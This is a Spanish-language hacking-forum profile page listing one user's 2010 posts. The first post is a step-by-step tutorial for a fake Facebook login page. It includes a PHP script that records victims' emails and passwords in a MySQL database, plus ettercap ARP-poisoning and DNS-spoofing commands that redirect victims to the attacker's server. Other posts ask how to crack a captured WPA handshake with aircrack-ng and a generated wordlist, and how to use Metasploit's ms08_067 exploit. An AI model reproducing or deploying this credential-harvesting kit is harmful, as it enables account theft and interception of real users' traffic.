elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking Básico / fakeFacebook en: 20 Diciembre 2010, 04:46 am
Vamos a crear un servidor LAMP, y falsear facebook (mientras la victima piensa que entra en facebook, en realidad entra en nuestro servidor apache) para que al ingresar las contraseñas queden grabadas en nuestra base de datos, tambien deberemos hacer un dns_spoof a la victima...

Sirve para cualquier web cambiando un par de parametros pero el ejemplo lo he hecho con facebook

1- Instalamos la base de datos:
sudo aptitude install php5 mysql-server libapache2-mod-auth-mysql php5-mysql phpmyadmin

2- Descargamos el phpMyAdmin lo descomprimimos y lo metemos en /var/www/

3- Configuramos la base de datos y creamos una base de datos llamada XXX con una tabla Passwords con tres campos que seran id, user, pass

Bien ya tenemos la base de datos configurada, ahora un poco de php.

4- Copiamos el index de facebook y lo metemos en nuestro servidor web,  /var/www/index.php
En este archivo debemos cambiar el action del <form id="login_form">
Citar
<form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" name="lsd" value="NLumB" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="es_ES" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Correo electrónico</label></td><td class="html7magic"><label for="pass">Contraseña</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" />.................

debemos poner este php como action dejando igual todo lo demas--> form method="POST" action="insert_into.php"

5-ponemos este insert_into.php en /var/www/
Citar
<?php
$conn=mysql_connect("127.0.0.1","userBaseDeDatos","passBaseDeDatos");
$err_db=mysql_select_db("XXX");

$usuario=$_POST['email'];
$contra=$_POST['pass'];

$sql="insert into Passwords (user, pass) values ('$usuario', '$contra')";
if ( ! $resul=mysql_query($sql,$conn))
{
   exit;
}
mysql_close();
//header ("Location: https://login.facebook.com/login.php?login_attempt=1");
?>

<html><head></head><body>
<form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)">
   <input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є">
   <input type="hidden" name="lsd" value="LzdnF" autocomplete="off">
   <input type="hidden" id="locale" name="locale" value="es_ES" autocomplete="off">
   <?php
      echo '<input type="hidden" class="inputtext" name="email" id="email" tabindex="1" value='.$usuario.'>';
      echo '<input type="hidden" class="inputtext" name="pass" id="pass" tabindex="2" value='.$contra.'>';
   ?>
   <!--<input value="Entrar" tabindex="4" type="submit">  -->
   <input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є">
   <input type="hidden" id="lsd" name="lsd" value="LzdnF" autocomplete="off">
   <script language="javascript" type="text/javascript">
      <!--
         document.getElementById('login_form').submit();
      //-->
   </script>
</form>
</body></html>

Bueno, por fin lo tenemos todo preparado, solo nos falta la ayuda de ettercap.

6-Configuramos el /usr/share/ettercap/etter.dns y ejecutamos ettercap
Citar
sudo echo *.facebook.*      A    TuIP > /usr/share/ettercap/etter.dns
sudo echo www.facebook.*      A    TuIP >> /usr/share/ettercap/etter.dns
sudo echo www.facebook.com      A    TuIP >> /usr/share/ettercap/etter.dns
sudo echo www.facebook.es      A    TuIP >> /usr/share/ettercap/etter.dns
sudo ettercap -T -q -i eth0 -M arp:remote -P dns_spoof // /ipRouter/

Bueno... vaya sermón he soltado.... Espero que sirva para aprender y disculpad que no me explique muy bien :S

SALUDOS!!!!
2  Seguridad Informática / Hacking Wireless / ./a.out |aircrack-ng -w ? *.cap en: 24 Octubre 2010, 20:09 pm
Mi problema es que tengo un diccionario que he creado en c, lo he compilado y me a sacado el a.out ejecutable, vale, pues quiero que el diccionario corra directamente como argumento de aircrack-ng para no tener que crear el diccionario, simplemente que mientras van saliendo las palabras del a.out me las vaya analizando como si fuera un diccionario. Me explico? supongo que sera posible. Ahh! el diccionario es normal y corriente, simplemente muestra palabras separadas por "\n" o saltos de linea.

Saludos! haber si podéis hecharme una manita ;)
3  Seguridad Informática / Hacking Wireless / fallo con diccionario+aircrack-ng en: 13 Octubre 2010, 03:27 am
No estoy seguro de que el tema esté bien aquí, quiza deberia ir en programacion o en hacking wireles... ante la duda lo he puesto aquí. :P

El problema que tengo es que he hecho un programa en c que crea un diccionario de 6 cifras y el aircrack no me lo coge.

El programa simplemente genera printf linea a linea los caracateres que quiero (del codigo ascci 32 al 126) y cada "palabra" esta separado por un printf("\n"). lo que hago es ejecutarlo y redireccionarlo a un archivo, por lo tanto el diccionario supongo que estará bien creado ya que aparentemente queda igual que cualquier otro, palabras separadas por saltos de linea.
Formato del diccionario resumido(coge todas las combinaciones posibles de 6 caracteres):
a
b
c
aa
ab
ac
aaa
aab
...

lo normal seria...
Citar

root@XXX:~/Escritorio$ aircrack-ng -w nombres_hombre.txt *.cap
Opening xxx-01.cap
Read 119095 packets.

   #  BSSID              ESSID                     Encryption

   1  xx:xx:xx:xx:xx  xxx                    WPA (1 handshake)

Choosing first network as target.

Opening xxx.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1


                   [00:00:00] 552 keys tested (715.80 k/s)


                       Current passphrase: waverley                   


      Master Key     : A3 EC 1F AB 23 47 B4 F6 20 3B 76 E5 C0 31 9E F1
                       07 0A 2B 27 66 3F B7 7B 28 48 8C E2 9F 80 F7 75

      Transient Key  : 62 7C 88 BB BA 37 D1 F5 15 4F AC 9F AB 6F 2D 9C
                       7E 97 0E DB F7 EE E6 5C 49 06 3D D8 17 D1 2B E3
                       20 EE 90 8F 40 42 33 AF 2A 7A 3E 62 65 61 91 05
                       CE 0B D5 35 1C 97 4B 57 4C 04 64 2A 73 CA A2 88

      EAPOL HMAC     : 61 C4 85 34 63 36 7B D5 C0 9C 3E 4C C2 B7 A9 34

Passphrase not in dictionary


pero lo que me ocurre es esto...
Citar

root@XXX:~/Escritorio$ aircrack-ng -w dic *.cap
Opening xxx-01.cap
Read 119095 packets.

   #  BSSID              ESSID                     Encryption

   1  xx:xx:xx:xx:xx  xxx                    WPA (1 handshake)

Choosing first network as target.

Opening xxx-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1
Passphrase not in dictionary



Quitting aircrack-ng...



alomejor si que me pasa el diccionario pero no me muestra por pantalla los numeros esos...

Bueno que opinais? espero alguna respuesta ;)


4  Foros Generales / Foro Libre / ver la redifusion de partidos del mundial? en: 21 Junio 2010, 23:21 pm
Alguien sabe alguna web para ver la redifusion de los partidos del mundial completos? He buscado pero solo encuentro resumenes y paginas para verlo en directo.

Me hariais un favor si alguien me contesta :D

Gracias  :)
5  Sistemas Operativos / GNU/Linux / videos navegador en tmp en: 29 Mayo 2010, 13:48 pm
No se porqué en pero aveces en ubuntu el reproductor de videos en youtube, megavideo, o cualquier otro sitio web me dá algún problema al visualizarse, ya que se relantiza o se queda como calado a ratos, vamos, que no me va muy fino. Busqué por google y encontré que no solo me pasaba a mi, y bueno, solo queria informaros de las medidas que yo tomo en estos casos y de paso, haber si alguien me soluciona el problema.

Cuando se carga un video en el navegador web, lo que haces es bajarte el video y ir visualizandolo "al vuelo" por tanto ese archivo tiene que estar descargado, lo hace en la carpeta tmp con el nombre de FlashVbWahf. Entonces lo único que hay que hacer para verlo perfectamente es utilizar el vlc o el reproductor que utiliceis normalmente. Ademas podeis sacarlo de la carpeta tmp y guardarlo en cualquier otro sitio para que no desaparezca. El unico contra que tiene este metodo esque el video esta en formato x-flv, aunque siempre podreis cambiarle el formato a .avi con el ffmpeg o a mp3. Bueno eso es todo, para mi es muy útil, espero que les sirva de ayuda el consejo Saludos!
6  Seguridad Informática / Hacking Wireless / VodafoneInternetMovil? informacion porfavor en: 29 Abril 2010, 21:49 pm
Hola a todos!

Desde hace unos dias me aparece un punto de acceso llamado VodafoneInternetMovil_15EB con MAC:xx:xx:xx:xx:15:EB y tiene contraseña WPA.

Alguien sabe algo sobre este tipo de routers?

Saludos!  ;D
7  Seguridad Informática / Wireless en Linux / conectarse a 2 redes al mismo tiempo? en: 28 Abril 2010, 18:02 pm
Wenas, simplemente una pregunta, me podria conectar con un mismo ordenador con linux intalado a dos redes wifi al mismo tiempo? disponiendo lógicamente de dos targetas de red. Utilizo ubuntu y backtrack.

Saludos!
8  Seguridad Informática / Hacking Básico / db_autopwn funciona? en: 22 Abril 2010, 20:11 pm
Hola tengo una duda, he investigado sobre el comando db_autopwn de metasploit framework 3.3 y parece que corre pero no me crea sesiones, en cambio lo ago manualmente (exploto con el simple windows/smb/ms08_067_netapi) y funciona a la perfección.

mis pasos son:
1-creo la base de datos en sqlite3
2-luego con db_nmap -n -sL -PN 192.168.1.5 en este caso una maquina virtual windows XP vulnerable al exploit windows/smb/ms08_067_netapi
3-db_ autopwn -t -p -e  tambien e probado la opcion -r para que sea una conexion reverse.

vale ahora empieza a comprobar y tal pero no me crea session meterpretetr incluso cuando comprueba con el exploit vulnerable el cual es visible en la consola.

se les ocurre algo que e hecho mal? si lo necesitan os enviaré screenshots que ahora estoy en clase y no tengo tiempo :P

gracias de antemano.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines